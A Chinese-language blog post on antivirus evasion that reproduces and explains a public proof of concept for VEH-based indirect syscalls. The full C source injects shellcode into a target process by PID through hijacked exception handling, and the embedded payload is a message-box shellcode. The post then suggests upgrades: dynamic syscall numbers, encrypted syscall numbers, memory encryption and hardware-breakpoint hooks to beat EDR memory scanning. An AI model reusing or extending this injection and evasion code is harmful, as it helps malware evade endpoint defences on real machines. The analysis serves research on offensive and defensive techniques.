免杀笔记 ---＞一种有想法的Indirect-Syscall

今天来分享一下，看到的一种Indirect-Syscall，也是两年前的项目了，但是也是能学到思路，从中也是能感受到杀软对抗之间的乐趣！！说到乐趣，让我想起看到过一位大佬的文章对"游褒禅山记"的段落引用，这里也深有同感，或许乐趣就在其中吧！！

而世之奇伟、瑰怪，非常之观，常在于险远，而人之所罕至焉，故非有志者不能至也！

1.Veh异常的引入

2.项目魔改方向

1.动态获取SSN

2.Veh的判断 && SSN的加密

3.增加内存对抗

1.Veh异常的引入

上一篇Blog讲到过很多Syscall，其中，有人发布了一种新颖的syscall的方式，也是通过Jmp去Ntdll实现的间接系统调用，但是这里引入了Veh。项目地址RedTeamOperations/VEH-PoC (github.com)https://github.com/RedTeamOperations/VEH-PoC/tree/main源代码如下

#pragma once
#include <Windows.h>
#include <stdio.h>
#include "incl.h"EXTERN_C DWORD64 SetSysCall(DWORD offset);BYTE* FindSyscallAddr(ULONG_PTR base) {BYTE* func_base = (BYTE*)(base);BYTE* temp_base = 0x00;//0F05 syscallwhile (*func_base != 0xc3) {temp_base = func_base;if (*temp_base == 0x0f) {temp_base++;if (*temp_base == 0x05) {temp_base++;if (*temp_base == 0xc3) {temp_base = func_base;break;}}}else {func_base++;temp_base = 0x00;}}return temp_base;
}ULONG_PTR g_syscall_addr = 0x00;
ULONG HandleException(PEXCEPTION_POINTERS exception_ptr) {// EXCEPTION_ACCESS_VIOLATION check is not stable, some situation like during loading library // might cause EXCEPTION_ACCESS_VIOLATION // TODO: Add more checks for stabilityif (exception_ptr->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {// Todo: decode syscall number in Rip if encoded// modifing the registersexception_ptr->ContextRecord->R10 = exception_ptr->ContextRecord->Rcx;// RIP holds the syscall numberexception_ptr->ContextRecord->Rax = exception_ptr->ContextRecord->Rip;// setting global addressexception_ptr->ContextRecord->Rip = g_syscall_addr;return EXCEPTION_CONTINUE_EXECUTION;}}void VectoredSyscalPOC(unsigned char payload[], SIZE_T payload_size, int pid) {ULONG_PTR syscall_addr = 0x00;FARPROC drawtext = GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwDrawText");if (drawtext == NULL) {printf("[-] Error GetProcess Address\n");exit(-1);}syscall_addr = (ULONG_PTR)FindSyscallAddr((ULONG_PTR)drawtext);if (syscall_addr == NULL) {printf("[-] Error Resolving syscall Address\n");exit(-1);} // storing syscall address globallyg_syscall_addr = syscall_addr;Init vectored handleAddVectoredExceptionHandler(TRUE, (PVECTORED_EXCEPTION_HANDLER)HandleException);NTSTATUS status;// Note: Below syscall might differ system to system // it's better to grab the syscall numbers dynamicallyenum syscall_no {SysNtOpenProcess = 0x26,SysNtAllocateVirtualMem = 0x18,SysNtWriteVirtualMem = 0x3A,SysNtProtectVirtualMem = 0x50,SysNtCreateThreadEx = 0xBD};// Todo: encode syscall numbers// init Nt APIs// Instead of actual Nt API address we'll set the API with syscall number// and calling each Nt APIs causes an exception which'll be later handled from the// registered vectored handler. The reason behind initializing each NtAPIs with// their corresponding syscall number is to pass the syscall number to the // exception handler via RIP register _NtOpenProcess pNtOpenProcess = (_NtOpenProcess)SysNtOpenProcess;_NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)SysNtAllocateVirtualMem;_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)SysNtWriteVirtualMem;_NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)SysNtProtectVirtualMem;_NtCreateThreadEx pNtCreateThreadEx = (_NtProtectVirtualMemory)SysNtCreateThreadEx;HANDLE hProcess = { INVALID_HANDLE_VALUE };HANDLE hThread = NULL;HMODULE pNtdllModule = NULL;CLIENT_ID clID = { 0 };DWORD mPID = pid;OBJECT_ATTRIBUTES objAttr;PVOID remoteBase = 0;SIZE_T bytesWritten = 0;SIZE_T regionSize = 0;unsigned long oldProtection = 0;// Getting handle to module//printf("loaded syscall before detect\n");//system("pause");// Init Object AttributesInitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);clID.UniqueProcess = (void*)mPID;clID.UniqueThread = 0;if (!LoadLibraryA("syscall-detect.dll")) {printf("Failed to load library \n");}printf("[+] Starting Vectored Syscall... \n");system("pause");//printf("loaded syscall detect\n");// open handle to target processstatus = pNtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clID);if (!NT_SUCCESS(status)) {printf("[-] Failed to Open Process: %x \n", status);exit(-1);}// Allocate memory in remote processregionSize = payload_size;status = pNtAllocateVirtualMemory(hProcess, &remoteBase, 0, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!NT_SUCCESS(status)) {printf("[-] Remote Allocation Failed: %x \n", status);exit(-1);}// Write payload to remote processstatus = pNtWriteVirtualMemory(hProcess, remoteBase, payload, payload_size, &bytesWritten);if (!NT_SUCCESS(status)) {printf("[-] Failed to write payload in remote process: %x \n", status);exit(-1);}// Change Memory Protection: RW -> RXstatus = pNtProtectVirtualMemory(hProcess, &remoteBase, &regionSize, PAGE_EXECUTE_READ, &oldProtection);if (!NT_SUCCESS(status)) {printf("[-] Failed to change memory protection from RW to RX: %x \n", status);exit(-1);}// Execute Remote Threadstatus = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteBase, NULL, FALSE, 0, 0, 0, NULL);if (!NT_SUCCESS(status)) {printf("[-] Failed to Execute Remote Thread: %x \n", status);exit(-1);}printf("[+] Injected shellcode!! \n");system("pause");
}int main(int argc, char** argv) {// parsing argumentint pid = 0;if (argc < 2 || argc > 2) {printf("[!] filename.exe <PID> \n");exit(-1);}pid = atoi(argv[1]);// MessageBox "hello world"unsigned char payload[] = "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00""\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8""\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00""\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33""\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00""\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D""\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B""\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61""\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33""\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F""\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00""\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F""\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60""\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24""\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27""\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7""\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33""\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C""\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED""\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45""\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C""\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48""\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6""\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B""\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B""\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C""\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44""\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6""\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";// Size of paylaodSIZE_T payload_size = sizeof(payload);// Invoke Classic Process InjectionVectoredSyscalPOC(payload, payload_size, pid);
}

其中这个syscall的一个特色就是它的Veh了，下面我们逐行代码解析

前面不多说的，我们直接跟进VectoredSyscalPOC 这个函数

VectoredSyscalPOC(payload, payload_size, pid);

首先通过找到ZwDrawText这个Zw函数的系统调用

	ULONG_PTR syscall_addr = 0x00;FARPROC drawtext = GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwDrawText");if (drawtext == NULL) {printf("[-] Error GetProcess Address\n");exit(-1);}syscall_addr = (ULONG_PTR)FindSyscallAddr((ULONG_PTR)drawtext);if (syscall_addr == NULL) {printf("[-] Error Resolving syscall Address\n");exit(-1);}

因为就算是天擎这种这么喜欢HookNt函数的也不hook这个冷门函数

我们跟进去FindSyscallAddr 这个函数

syscall_addr = (ULONG_PTR)FindSyscallAddr((ULONG_PTR)drawtext);

这个就是在再通过不断移动func_base的地址，来找到drawtext它syscall的地址

BYTE* FindSyscallAddr(ULONG_PTR base) {BYTE* func_base = (BYTE*)(base);BYTE* temp_base = 0x00;//0F05 syscallwhile (*func_base != 0xc3) {temp_base = func_base;if (*temp_base == 0x0f) {temp_base++;if (*temp_base == 0x05) {temp_base++;if (*temp_base == 0xc3) {temp_base = func_base;break;}}}else {func_base++;temp_base = 0x00;}}return temp_base;
}

接着就是异常处理函数的引入了

AddVectoredExceptionHandler(TRUE, (PVECTORED_EXCEPTION_HANDLER)HandleException);

这里我们先不跟进去（我个人觉得会更好理解），我们继续往下看

	enum syscall_no {SysNtOpenProcess = 0x26,SysNtAllocateVirtualMem = 0x18,SysNtWriteVirtualMem = 0x3A,SysNtProtectVirtualMem = 0x50,SysNtCreateThreadEx = 0xBD};// Todo: encode syscall numbers// init Nt APIs// Instead of actual Nt API address we'll set the API with syscall number// and calling each Nt APIs causes an exception which'll be later handled from the// registered vectored handler. The reason behind initializing each NtAPIs with// their corresponding syscall number is to pass the syscall number to the // exception handler via RIP register _NtOpenProcess pNtOpenProcess = (_NtOpenProcess)SysNtOpenProcess;_NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)SysNtAllocateVirtualMem;_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)SysNtWriteVirtualMem;_NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)SysNtProtectVirtualMem;_NtCreateThreadEx pNtCreateThreadEx = (_NtProtectVirtualMemory)SysNtCreateThreadEx;

这里就是把上面的SSN分别给了每一个nt函数的地址（是不是有点奇怪，别急！好戏开场！）

	status = pNtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &clID);if (!NT_SUCCESS(status)) {printf("[-] Failed to Open Process: %x \n", status);exit(-1);}// Allocate memory in remote processregionSize = payload_size;status = pNtAllocateVirtualMemory(hProcess, &remoteBase, 0, &regionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!NT_SUCCESS(status)) {printf("[-] Remote Allocation Failed: %x \n", status);exit(-1);}// Write payload to remote processstatus = pNtWriteVirtualMemory(hProcess, remoteBase, payload, payload_size, &bytesWritten);if (!NT_SUCCESS(status)) {printf("[-] Failed to write payload in remote process: %x \n", status);exit(-1);}// Change Memory Protection: RW -> RXstatus = pNtProtectVirtualMemory(hProcess, &remoteBase, &regionSize, PAGE_EXECUTE_READ, &oldProtection);if (!NT_SUCCESS(status)) {printf("[-] Failed to change memory protection from RW to RX: %x \n", status);exit(-1);}// Execute Remote Threadstatus = pNtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteBase, NULL, FALSE, 0, 0, 0, NULL);if (!NT_SUCCESS(status)) {printf("[-] Failed to Execute Remote Thread: %x \n", status);exit(-1);}

然后就是分别调用这些NT函数(shellcode注入)，但是他们调用的地址都是非法的，所以就会引发异常！！！😋😋

这时候我们再去跟进异常处理函数

ULONG_PTR g_syscall_addr = 0x00;
ULONG HandleException(PEXCEPTION_POINTERS exception_ptr) {// EXCEPTION_ACCESS_VIOLATION check is not stable, some situation like during loading library // might cause EXCEPTION_ACCESS_VIOLATION // TODO: Add more checks for stabilityif (exception_ptr->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {// Todo: decode syscall number in Rip if encoded// modifing the registersexception_ptr->ContextRecord->R10 = exception_ptr->ContextRecord->Rcx;// RIP holds the syscall numberexception_ptr->ContextRecord->Rax = exception_ptr->ContextRecord->Rip;// setting global addressexception_ptr->ContextRecord->Rip = g_syscall_addr;return EXCEPTION_CONTINUE_EXECUTION;}}

我们就突然熟悉了！！！所以我手动加了一个注释🤠

//This Stub Should Look Like
//mov  r10 , rcx 
//mov  eax , ssn 
//jmp  ntdll!syscallAddr

因为异常处理函数中，我们能获取到它发生异常的地址，而碰巧，我们就调用nt函数的时候这个地址，正好被换成了我们的ssn！！ 所以我们的 exception_ptr->ContextRecord->Rip 就是SSN，这里是我认为非常巧妙的一个点！

然后把程序的Rip指向我们之前找到的drawtext它syscall的地址，正正好好的完成了我们的IndirectSyscall！！！

而他的另外一个很大的优点是什么！！

：它不用构造特定的Stub，或者说不会出现Syscall，Jmp或者说考虑SysWhisper3的egg这种操作，也是可以规避了Syscall的特征检测！！

2.项目魔改方向

1.动态获取SSN

在这份代码中，SSN是作者直接写死了的，于是作者也加了这样的一个注释

	// Note: Below syscall might differ system to system // it's better to grab the syscall numbers dynamically

我们可以动态获取SSN，这种方式已在大部分Syscall项目中实现

2.Veh的判断 && SSN的加密

这个是作者认为可以改进的地方，也是在代码中抛出的

	// EXCEPTION_ACCESS_VIOLATION check is not stable, some situation like during loading library // might cause EXCEPTION_ACCESS_VIOLATION // TODO: Add more checks for stability

这里是作者前面进行了LoadLibrary的操作，担心导致0xc000005，这里可以加上判断异常地址的值通过算法计算是否是加密的SSN！因为这里作者也是提到了SSN可以进行一个加密的操作

// Todo: encode syscall numbers// init Nt APIs// Instead of actual Nt API address we'll set the API with syscall number// and calling each Nt APIs causes an exception which'll be later handled from the// registered vectored handler. The reason behind initializing each NtAPIs with// their corresponding syscall number is to pass the syscall number to the // exception handler via RIP register

所以我们可以对SSN进行加密，然后我们后面 mov eax ，ssn 的操作就可以变成这样

exception_ptr->ContextRecord->Rax = Decrypt(exception_ptr->ContextRecord->Rip);

3.增加内存对抗

现在的对抗趋势，已经逐渐往内存对抗上去进行（如某绒新增的内存查杀可把某些人杀的不浅），所以我们也是可以进行内存动态加解密，但是这里可以配合一种无痕的Hook技术 "硬件断点"，这个后续也会进行更新。

主要是通过Inline-Hook需要修改内存，如果以后的AV || EDR 增加"内存巡检"，那么我们的Patch内存将会是一种灾难，甚至会导致直接查杀，但是即使是硬件断点，也是可以被检测！但是还是那句话，"道高一丈，魔高一尺"，或许杀软对抗的乐趣就在其中吧！！！ :>)